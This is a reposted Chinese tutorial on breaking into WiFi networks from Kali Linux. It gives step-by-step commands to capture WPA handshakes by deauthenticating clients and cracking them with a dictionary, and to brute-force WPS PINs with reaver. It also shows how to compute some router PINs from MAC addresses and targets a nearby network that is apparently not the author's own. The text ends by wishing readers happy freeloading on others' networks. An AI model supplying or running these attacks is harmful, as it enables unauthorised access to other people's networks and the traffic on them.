轉自: http://www.secbox.cn/hacker/wireless/4877.html
工具:
1:筆記本
2:USB無線網卡(必備)
3:kali系統
4:靠譜字典
第一種方法:
暴力破解法
何為暴力破解呢,其實就是一個一個密碼試,直到正確的密碼為止。
現在的wifi一般加密都是:
1、不啟用安全2、WEP
3、WPA/WPA2-PSK(預共享密鑰)
4、WPA/WPA2 802.1X (radius認證)
進入正題:
第一步:
進入kali啟動終端輸入如下:
root@kali:~# airmon-ng
看看網卡信息
第二步:
輸入:
airmon-ng start wlan0
監聽窗口
第三步:
輸入:
airodump-ng mon0
掃描wifi信號
這里我用自己家wifi做實驗
第四步:
這是我家wifi:
上圖可以看出
BSSID是 00:0F:32:A0:99:DC 信道(CH)是:1
輸入:
airodump-ng -w freedom -c CH --bssid 00:0F:32:A0:99:DC mon0 --ignore-negative-one
解釋:CH表示信道,信道是多少就填多少,freedom是一會抓握手包的文件名字,他會自動生成一個freedom.cap的文件,這個名字隨便你們填什么
00:0F:32:A0:99:DC 64:5A:04:BB:54:57 -4 0e- 0e 0 400
00:0F:32:A0:99:DC 這個是路由器的mac
64:5A:04:BB:54:57 這個是客戶端的mac
第五步:
重新開一個客戶端輸入命令:
aireplay-ng --deaut 10 -a 00:0F:32:A0:99:DC -c 64:5A:04:BB:54:57 mon0 --ignore-negative-one
掉線了,當我們重新連接抓到握手包
第六步:
破解握手包:
命令如下:
aircrack-ng -w mi freedom-*.cap
解釋:mi字典名字 freedom-*.cap
abc123abc這個就是我的wifi密碼
破解完成,成功與否靠強大的字典和運氣了,希望各位親們蹭網愉快!!!
第二種:通過pin碼破解
這個方法很簡單:
第一步:Wash 掃描開啟WPS的網絡。
wash -i mon1 –C
小編的周圍沒有開啟wps功能我wifi,就會出現上圖那樣,這樣咋辦呢
不要急,因為有些隱藏了起來,我們直接霸王硬上弓
用前面那個掃wifi的命令:
airodump-ng mon0
看見小編圈起來的mac沒有,選擇一個PWR的值的絕對值小於70的wifi破解
第二步:
我在這選擇的是名字為: FAST_F70E的wifi
就他了:E4:D3:32:7F:F7:0E -45 2 0 0 6 54e. WPA2 CCMP PSK FAST_F70E
然后命令如下:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S -vv
E4:D3:32:7F:F7:0E 這個mac根據路由器的mac更改,我破解的wifi的mac是E4:D3:32:7F:F7:0E

如圖上表示可以破解,開啟了wps功能

出現上圖這樣,就表示不能破解換其他wifi破解吧孩子

這樣就表示破解出來了
小知識:
如果密碼被改了你知道他wifi的pin碼就用如下命令:reaver-i mon0 -b MAC -p PIN
pin碼有8位:所以就是10的8次方,要窮舉1000000000次
這樣pin也是有限制的,比如要被pin出的路由器必須得開啟wps功能;貌似現在很多都是防pin路由器或300秒pin限制的。
有些路由pin碼可以通過計算得到:騰達和磊科的產品如果路由MAC地址是以“C83A35”或“00B00C”打頭那么可以直接計算出PIN值。
比如這個:bssid :Tenda_579A18 mac :C8:3A:35:57:9A:18 通過計算器將mac后6位換算成10進制數,得到5741080(pin碼的前7位),最多試10次或通過軟件得到該路由pin碼!
破解時推薦這個命令:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S –d9 –t9 -vv
因為 –d9 –t9參數 可以防止pin死路由器。
